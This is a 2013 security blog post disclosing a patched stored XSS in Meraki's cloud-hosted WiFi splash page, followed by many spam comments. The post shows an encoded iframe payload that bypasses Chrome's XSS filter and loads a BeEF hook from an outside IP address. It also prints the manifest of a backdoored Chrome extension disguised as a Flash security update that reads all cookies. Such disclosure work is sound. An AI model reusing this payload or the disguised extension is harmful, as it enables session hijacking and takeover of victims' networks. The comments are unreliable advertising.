Monday, March 11, 2013

Subverting a cloud-based infrastructure with XSS and BeEF

Well, the world is changing. You can probably do a lot more direct damage with a XSS in a high-value site than with a local privilege escalation in sudo [...] - lcamtuf@coredump.cx
If you are intrigued by sophisticated exploits and advanced techniques, Cross-Site Scripting is probably not the most appealing topic for you. Nevertheless, recent events demonstrated how this class of vulnerabilities has been used to compromise applications and even entire servers.

Today, we are going to present a possible attack scenario based on a real-life vulnerability that has been recently patched by the Meraki team. Although the vulnerability itself isn't particularly interesting, it is revealing how a trivial XSS flaw can be abused to subvert an entire network infrastructure.



Meraki

Meraki is the first cloud-managed network infrastructure company and it's now part of Cisco Systems. The idea is pretty neat: all network devices and security appliances (wired and wireless) can be managed by a cutting-edge web interface hosted in the cloud, allowing Meraki networks to be completely set up and controlled through the Internet. Many enterprises, universities and numerous other businesses are already using this technology.

As usual, new technologies introduce opportunities and risks. In such environments, even a simple Cross-Site Scripting or a Cross-Site Request Forgery vulnerability can affect the overall security of the managed networks.

The vulnerability

During a product evaluation of a cloud managed Wireless Access Point, we noticed it was possible to personalize the portal splash page.  Users accessing your WiFi network can be redirected to a custom webpage (e.g. containing a disclaimer) before accessing Internet.

To further customize our splash page, we started including images and other HTML tags. With big surprise, we quickly discovered that just a basic HTML/JS validation was performed in that context. As a result, we were able to include things like:


What was even more interesting is the fact that the splash page is also hosted in the cloud. Unlike traditional WiFi APs where the page is hosted on the device itself, Meraki appliances use cloud resources.

https://n20.meraki.com/splash/?mac=XXXX&client_ip=XXXX&client_mac=XXXX&vap=0&a=XXXX&b=XXXX&auth_version=5&key=ef1115d... AUTH_KEY...d41c283&node_ip=XXXX&acl_ver=XXXX&continue_url=http%3A%2F%2Fwww.google.com

To protect that page from random visitors, a unique token is used for authentication. Assuming you provide the right token and other required parameters, that page is accessible to Internet users.

Now, let's add to the mix that Meraki uses a limited number of domains for all customers (e.g. n1-29.meraki.com, etc.) and, more importantly, that the dashboard session token is scoped to *.meraki.com. This factor turns the stored XSS affecting our own device's domain to a vulnerability that can be abused to retrieve the dashboard cookie of other users and networks. 

Attack scenario

An attacker with access to a Meraki dashboard can craft a malicious JS payload to steal the dashboard session cookie and obtain access to other users' devices. In practice, this allows someone to completely take over Meraki's wired and wireless networks.

BeEF, the well-know Browser Exploitation Framework, has been used to simulate a realistic attack:

  1. The attacker customizes the splash page of his/her WiFi AP with an arbitrary JS payload, which includes the BeEF hook 
  2. Connecting a device to the physical wireless network controlled by the attacker (e.g. a testing device), it is possible to retrieve the URL of the splash page including the unique token 
  3. Using social engineering, the attacker tricks the victim(s) into visiting the attacker-controlled splash page
  4. At this point, the victim browser is hooked in BeEF
  5. Using one of the available BeEF modules, the attacker can retrieve the HttpOnly dash_auth cookie and get access to the victim's Meraki dashboard 
  6. In the case of Meraki WiFi Access Point, a convenient map will display the position of the device. In the config tab, it is also possible to disclose the network's password. At this stage, the actual network can be fully controlled by the attacker

  

A demonstration video of the attack is also available:



For the interested readers, a few technical details:
  • Cookie flags (e.g. HttpOnly) are the ASLR/DEP of browser security. It is possible to bypass those mitigation techniques,  although it's getting more complex. Thanks to the progress of browser security and general awareness, stealing cookies marked as HttpOnly via JS payload isn't trivial anymore. Cross Site Tracing and similar techniques are obsolete. Browser plugins have been also patched. Besides exploiting specific servers or browsers bugs, attackers can only rely on social engineering tricks. During our Proof-of-Concept, a fake Flash update has been used to install a malicious Chrome extension and get access to all cookies
  • Chrome extensions run with different privileges than normal JavaScript code executed by the renderer. A Chrome extension can override default SOP restrictions and issue cross-domain requests reading the HTTP response, accessing other browser tabs, and also reading every cookie including those marked as HttpOnly. The manifest of the deliberately backdoored Chrome Extension is the following. The background.js file loads the BeEF hook.

    {
      "name": "Adobe Flash Player Security Update",
      "manifest_version": 2,
      "version": "11.5.502.149",
      "description": "Updates Adobe Flash Player with latest securty updates",
      "background": {
        "scripts": ["background.js"]
      },
      "content_security_policy": "script-src 'self' 'unsafe-eval' https://174.136.111.122; object-src 'self'",
      "icons": { 
        "16": "icon16.png",
        "48": "icon48.png",
        "128": "icon128.png" 
      },
      "permissions": [
    "tabs", 
    "http://*/*", 
    "https://*/*",
      "cookies"
      ]
    }

    Not to blame Google, but just FYI when the backdoored Chrome Extension was uploaded to Google Chrome Webstore, it was available straight after the upload. No checks were made by the application, for example to prevent the upload of an extension with very relaxed permissions, unsafe-eval CSP directive, and Name/Description fields containing an obviously fake content such as "Adobe Flash Update" 
  • Choosing Google Chrome as target browser required to bypass XSS Auditor, the integrated Anti-XSS filter. As discovered by Mario Heiderich, the data URI schema with base64 content can be leverage to bypass the filter. The following code snippet will trigger the classic alert(1), even on the latest Google Chrome at the time of writing (version 24.0.1312.71)


  • The final attack vector to inject the initial BeEF hook in Meraki's page is:

    <iframe src="data:text/html;base64,PHNjcmlwdD5zPWRvY3VtZW50LmNyZ
    WF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3MudHlwZT0ndGV4dC9qYXZhc2Nya
    XB0JztzLnNyYz0naHR0cHM6Ly8xNzQuMTM2LjExMS4xMjIvaG9vay5qc
    yc7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswX
    S5hcHBlbmRDaGlsZChzKTs8L3NjcmlwdD4=">


    And what is actually executed is:

    <script> s=document.createElement('script'); s.type='text/javascript'; s.src='https://174.136.111.122/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

    Having a backdoored Chrome Extension running in your browser opens for many new attack vectors wich we din't covered in the PoC. For example, it is possible to inject the BeEF hook in every open tab (you can get the impact of this :-), or use the victim browser as an open proxy using BeEF's Tunneling Proxy component and many other attacks.

This blog post is brought to you by @_ikki (NibbleSec) and @antisnatchor (BeEF core dev team).
Thanks to Meraki for the prompt response.

49 comments:


  1. Thanks for posting this useful content, Good to know about new things here, Let me share this, . Hadoop training in pune

    ReplyDelete
  2. Nonetheless, you have to make certain that the service you are utilizing for backing up your data is steady and reliable, as the data could not be offered in case of downtimes as well as get lost in case they head out of service.
    goodcloudstorage

    ReplyDelete
  3. This blog will tell you more about education in Nepal. Check it out!

    ReplyDelete

  4. تنظيف المكيفات ببريدة والقصيم
    تواجه مشاكل مع مكيف الهواء الخاص بك؟ العديد من المشاكل التي لديك مع مكيف الهواء الخاص بك قد تحل ببساطة تفعل ذلك بنفسك خطوات الصيانة التي يمكنك اتخاذها. القول المأثور "يبقيه بسيط غبي" يقطع شوطا طويلا. قبل افتراض أن لديك مشكلة تقنية الرئيسية التي يتطلب اصلاح مكيف لإصلاحها بعد اتهام لك ثروة، تبدأ من خلال القيام ببعض الخطوات البسيطة صيانة أجهزة تكييف الهواء وفحص بعض المشاكل واضحة.
    شركة تنظيف مكيفات بالقصيم
    شركة تنظيف مكيفات ببريدة
    شركة تنظيف مكيفات بعنيزة
    شركة تنظيف مكيفات بالبكيرية
    أولا عليك دائما أن تكون على يقين لديك فلتر الهواء النقي في النظام الخاص بك. إذا كنت وحدة لم التبريد وهل لاحظت تراكم الجليد أو حول وحدتك في الأماكن المغلقة أو في الهواء الطلق يجب إيقاف مكيف الهواء وإيقاف المروحة على لمدة 6-8 ساعات للسماح الجليد لذوبان الجليد. تذكر
    الجليد ترى من خارج النظام الخاص بك ليست سوى جزء صغير منه. معظم البناء الجليد حتى على المبخر أو لفائف داخل عمل القناة الخاص بك ان كنت لا تستطيع رؤية ذلك تأكد من السماح لها ذوبان الجليد لمدة 6-8 ساعات قبل ان يتحول حدتك مرة أخرى. بمجرد تحويله يعود على يقين الفلتر نظيف، جميع سجلات مفتوحة، والمنطقة المحيطة عن العرض والعودة السجلات هو واضح. إذا كان النظام يتجمد مرة أخرى بمجرد تشغيله سوف تحتاج إلى استدعاء المؤهلين اصلاح مكيف الهواء. يمكن أن النظام الخاص
    بك تكون منخفضة على الفريون. إذا يضيف الفريون ولكن غير قادر على تحديد موقع تسرب يمكنك محاولة "الفريون طقم إصلاح تسرب" تباع عبر الإنترنت التي هي سهلة لوضعها في النظام الخاص بك.
    شركة تنظيف مكيفات بالقصيم
    شركة تنظيف مكيفات ببريدة
    شركة تنظيف مكيفات بعنيزة
    شركة تنظيف مكيفات بالبكيرية


    ReplyDelete
  5. Awesome blog. I would love to see true life prepared to walk, so please share more informative updates. Great work keeps it up. PSE-Platform dumps

    ReplyDelete
  6. Pass Oracle 1z0-964 vce exam at first try. Download free 1z0-964 test answers for VCE Player.

    ReplyDelete
  7. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

    ReplyDelete
  8. feel regret I did not know this before I read your article, thank for sharing! news today

    ReplyDelete
  9. Great post! I didn’t knowral of these resources and I’m going to go check them out now! marvel movies

    ReplyDelete
  10. I enjoy reading your blog. It's inspriring. Hope that you release more blog like this hotmail login

    ReplyDelete
  11. Thank you for that information you article
    atari breakout

    ReplyDelete
  12. I read your blog post and this is nice blog post.. thanks for taking the time to share with us. have a nice day shoe covers made in Canada

    ReplyDelete
  13. Thanks for the informative article. This is one of the best resources I have found in quite some time. Nicely written and great info, I really thank you for sharing it.
    Business Assignment Help

    ReplyDelete
  14. The assignments we offer students are more advanced than regular research paper writing help and we make sure we clearly understand every instruction client’s provide us before we start our cheap custom essay writing services process.

    ReplyDelete
  15. This shows what impact does different negative and fake reviews of best paper writing service and how it can affect the business.
    Reviews or testimonials regarding any service are the only way to get an idea about its quality and credibility. MyAssignmentHelp Review feedbacks from students all over the world. MyAssignmenthelp.com reviews show the dedication and efforts the company put to ensure 100% quality. Although most of the reviews are positive, but there are testimonials with negative feedback as well.
    It is needless to say that if the students are convinced that edubirdie review is not a good, they will definitely not opt for it. Therefore, if the number of negative and fake reviews is increased on reputed sites like essay reviews, the sale can rapidly get down.
    To counter this issue, the only way is to go through or read Argumentative Essay on Essay Writing Services that are posted on the site,
    However, essayshark review and Uk essays review posted on the sites are very small.

    ReplyDelete
  16. Really very informative and creative. This sharing concept is a good way to enhance knowledge. www.appslure.com

    ReplyDelete
  17. APSCA dumps - Real APSCA Dumps Practice Exam Questions from myexamcollection.com. Guaranteed preparation better than pass4sure APSCA Q&A.

    ReplyDelete
  18. Thank you for that information you article

    minecraft 2

    ReplyDelete
  19. We are the best writing company providing Write My Nursing Research Paper Services of the highest quality. Our articles are appropriately formatted and referenced Nursing Research Paper Writing Services under institutional or professor’s guidelines.

    ReplyDelete
  20. I am looking for how selectors review admission essay to write my complete admission essay.
    But with an increased in the demand for compare Essay Writing Services, many fake service providers have mushroomed all over the internet.
    There are many writing services which promise to be reliable and affordable. One such authentic service provider is Myassignmenthelp Review, So read review and take help from them and I got the best of me.
    But after reading edubirdie review I thought of writing this in order to make the students aware against this writing service so that they do not get trapped. The information that I have received from the reviews shed light on the poor quality of assignments.
    And In another uk essays review received from the student I found out that the company charges less but they compromise the work for the less amount of money. She had placed an order for doing her assignment on film review.

    ReplyDelete
  21. Some economists are predicting a recession in the next year, but the New York Federal Reserve’s quarterly
    household debt survey last week showed few portents. Battle https://eresaw.com lines have been drawn around General Electric’s stock,
    and the options market is handsomely rewarding investors for choosing sides.

    ReplyDelete
  22. Thank you
    Visit the Official brefuni News , Find all sports news 24/7 and the latest sports news and breaking sports stories including Football, Tennis, F1, Golf and Rugby : https://brefuni.com

    ReplyDelete
  23. You have all the reasons not to trust cheap paper writing services, Custom Writing Writers, and dissertation writing help. We offer the Write an Essay for Me to the clients at an affordable price.

    ReplyDelete
  24. Your information is useful to me and many people are looking for them like me
    pogo games

    ReplyDelete
  25. Awesome article with astounding idea!Thank you for such a significant article. I truly acknowledge for this extraordinary data... Download more photos in pictaram

    ReplyDelete
  26. Dry wood ants are one of the most dangerous termites that do not need to be in contact with the soil. It attacks houses directly. It works to obtain sources of nutrition quickly. It is an ants that do not need water so heavily to live. It attacks floors, houses, wooden walls and furniture and calls it ant furniture because it has a great ability to destroy pieces of furniture.
    شركة مكافحة النمل الابيض
    شركة مكافحة النمل الابيض بالخرج
    شركة مكافحة حشرات بالخرج
    شركة رش مبيدات بالخرج

    ReplyDelete
  27. Hi, I think your website might be having web browser compatibility problems. Whenever I take a look at your blog in Safari, it looks fine however when opening in Internet Explorer, it's got some overlapping issues. I merely wanted to give you a quick heads up! Besides that, great blog!
    10.1.1.1
    192.168.11.1
    192.168.3.1
    192.168.100.1
    192.168.0.100

    ReplyDelete
  28. it's far useless to say that if the students are satisfied that review isn't always awesome, they may surely now not choose it. a few economists are predicting a recession in Assignment Writing Companies the next 12 months, however, the big apple federal reserve’s quarterly family debt survey closing week showed few portents.

    ReplyDelete
  29. I recommend for that everyone should seek help from Online Assignment Help in Unite States for the best academic help. There are professional experts from various esteemed universities in almost every field. So, see their samples and then compare it with other sites. Well if you get time you must read more
    programming assignment help
    online assignment help
    do my assignment
    Assignment Writing Help

    ReplyDelete
  30. Usually cloud based servers are hard to work with! Especially a Subverting a cloud-based infrastructure with XSS and BeEF can give you a hard time configuring. When people stuck with the configuration the always ask for help. Help can be of any kind I generally avail cheap essay writing service help for my assignments.

    ReplyDelete
  31. The 92nd Academy Awards will once again air on ABC on Sunday, Feb. 9, and the night is sure to be filled with glitz, glamour, and maybe even a few more upsets. https://oscars2020news.com/updates-about-the-oscar-2020-snubs-have-surprises-ahead-of-92nd-academy-awards/

    ReplyDelete
  32. The 92nd Academy Awards ceremony, presented by the Academy of Motion Picture Arts and Sciences, will honor the best films of 2019 and will take place at the Dolby Theatre in Hollywood, Los Angeles, California.
    https://oscars2020news.com
    Oscars 2020 Live
    Oscars 2020 Live Stream

    ReplyDelete
  33. it's very good post which I really enjoyed reading. It is not everyday that I have the possibility to see something like this.
    click on here

    ReplyDelete
  34. I read this article! I hope you will continue to have such articles to share with everyone! thank you!

    Flud Pc

    ReplyDelete
  35. We will discuss cloud computing which is the on-demand availability of computer system resources, especially data storage and computing power, without direct active management by the user. IT related persons can get benefits from this service.
    Buy Dissertation Online.

    ReplyDelete
  36. Students assignment help is a scam and nothing else. I asked for the refund for the assignment that they were not able to complete. After several arguments they finally agreed to repay me but it did not happen. The status changed to refund initiated but today is almost a week and I did not receive a single penny.
    Affordable papers review: They charge a significant amount of money, but do not deliver the quality they are supposed to deliver. I have availed their services a couple of times. And in both the orders, I have received average-quality solutions.
    customessays review: The result wasn’t as good as I expected. In addition, I had to wait a lot to get my paper done. My writer didn’t answer my messages while the constant communication was guaranteed. It was not bad but I will not use your service again.”
    Same day papers review: They are really done great work. Their writers are highly professional and deliver the paper within the given deadline. I use service repeatedly.I like this company!

    ReplyDelete
  37. Astounding review! It's qualified to peruse. The essayist makes reference to all the basic subtleties required to comprehend the expression "Assignment Help." It is extremely significant for a researcher to finish the task in best way to score most extreme imprints. In the event that you need to attempt adequate task support, visit: Online coursework service
    Assignment Help In US

    ReplyDelete
  38. Thanks for your helpful sharing. I have read that knowledge very much, it gives me a lot of things.
    Tinkle for PC

    ReplyDelete